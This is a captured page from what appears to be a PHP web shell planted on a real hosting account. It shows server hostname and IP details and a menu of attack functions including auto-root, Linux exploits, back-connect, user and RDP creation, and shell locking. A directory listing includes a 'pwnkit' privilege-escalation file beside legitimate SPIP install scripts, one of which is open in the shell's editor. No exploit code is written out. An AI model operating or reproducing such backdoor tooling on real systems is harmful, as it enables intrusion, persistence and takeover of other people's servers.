Linux webm008.cluster115.gra.hosting.ovh.net 6.18.42-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Wed Aug 5 15:59:48 CEST 2026 x86_64
Apache
: 10.115.20.8 | : 216.73.216.59
Cant Read [ /etc/named.conf ]
8.1.34
quelfutuu
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
quelfutuu /
www /
ecrire /
install /
[ HOME SHELL ]
Name
Size
Permission
Action
.mad-root
0
B
-rw-r--r--
etape_.php
1.58
KB
-rw----r--
etape_1.php
2.74
KB
-rw----r--
etape_2.php
5.66
KB
-rw----r--
etape_3.php
11.17
KB
-rw----r--
etape_3b.php
6.24
KB
-rw----r--
etape_4.php
2.56
KB
-rw----r--
etape_chmod.php
4.07
KB
-rw----r--
etape_fin.php
2.48
KB
-rw----r--
etape_ldap1.php
2.58
KB
-rw----r--
etape_ldap2.php
3.65
KB
-rw----r--
etape_ldap3.php
2.89
KB
-rw----r--
etape_ldap4.php
3.63
KB
-rw----r--
etape_ldap5.php
4.13
KB
-rw----r--
index.php
2
B
-rw----r--
pwnkit
0
B
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : etape_ldap3.php
<?php /***************************************************************************\ * SPIP, Système de publication pour l'internet * * * * Copyright © avec tendresse depuis 2001 * * Arnaud Martin, Antoine Pitrou, Philippe Rivière, Emmanuel Saint-James * * * * Ce programme est un logiciel libre distribué sous licence GNU/GPL. * \***************************************************************************/ if (!defined('_ECRIRE_INC_VERSION')) { return; } function install_etape_ldap3_dist() { $info = []; $adresse_ldap = _request('adresse_ldap'); $login_ldap = _request('login_ldap'); $pass_ldap = _request('pass_ldap'); $port_ldap = _request('port_ldap'); $base_ldap_text = defined('_INSTALL_BASE_LDAP') ? _INSTALL_BASE_LDAP : 'ou=users, dc=mon-domaine, dc=com'; $minipage = new Spip\Afficher\Minipage\Installation(); echo $minipage->installDebutPage(['onload' => 'document.getElementById(\'suivant\').focus();return false;']); echo info_etape( _T('info_chemin_acces_1'), info_progression_etape(3, 'etape_ldap', 'install/') ), _T('info_chemin_acces_2'); $ldap_link = @ldap_connect("$adresse_ldap", "$port_ldap"); if ($ldap_link) { @ldap_bind($ldap_link, "$login_ldap", "$pass_ldap"); $result = @ldap_read($ldap_link, '', 'objectclass=*', ['namingContexts']); $info = @ldap_get_entries($ldap_link, $result); @ldap_close($ldap_link); } $checked = false; $res = ''; if (is_array($info) and $info['count'] > 0) { $res .= '<p>' . _T('info_selection_chemin_acces') . '</p>'; $res .= '<ul>'; $n = 0; for ($i = 0; $i < $info['count']; $i++) { $names = $info[$i]['namingcontexts']; if (is_array($names)) { for ($j = 0; $j < $names['count']; $j++) { $n++; $res .= '<li><input name="base_ldap" value="' . spip_htmlspecialchars($names[$j]) . "\" type='radio' id='tab$n'"; if (!$checked) { $res .= ' checked="checked"'; $checked = true; } $res .= '>'; $res .= "<label for='tab$n'>" . spip_htmlspecialchars($names[$j]) . "</label></li>\n"; } } } $res .= '</ul>'; $res .= _T('info_ou') . ' '; } $res .= "<br>\n<input name=\"base_ldap\" value=\"\" type='radio' id='manuel'"; if (!$checked) { $res .= ' checked="checked"'; $checked = true; } $res .= '>' . "\n<label for='manuel'>" . _T('entree_chemin_acces') . '</label> ' . "\n<fieldset>" . "<input type='text' name='base_ldap_text' class='text' value=\"$base_ldap_text\" size='40'>" . "\n</fieldset>" . "\n<input type='hidden' name='etape' value='ldap4'>" . install_propager(['adresse_ldap', 'port_ldap', 'login_ldap', 'pass_ldap', 'protocole_ldap', 'tls_ldap']) . bouton_suivant(); echo generer_form_ecrire('install', $res); echo $minipage->installFinPage(); }
Close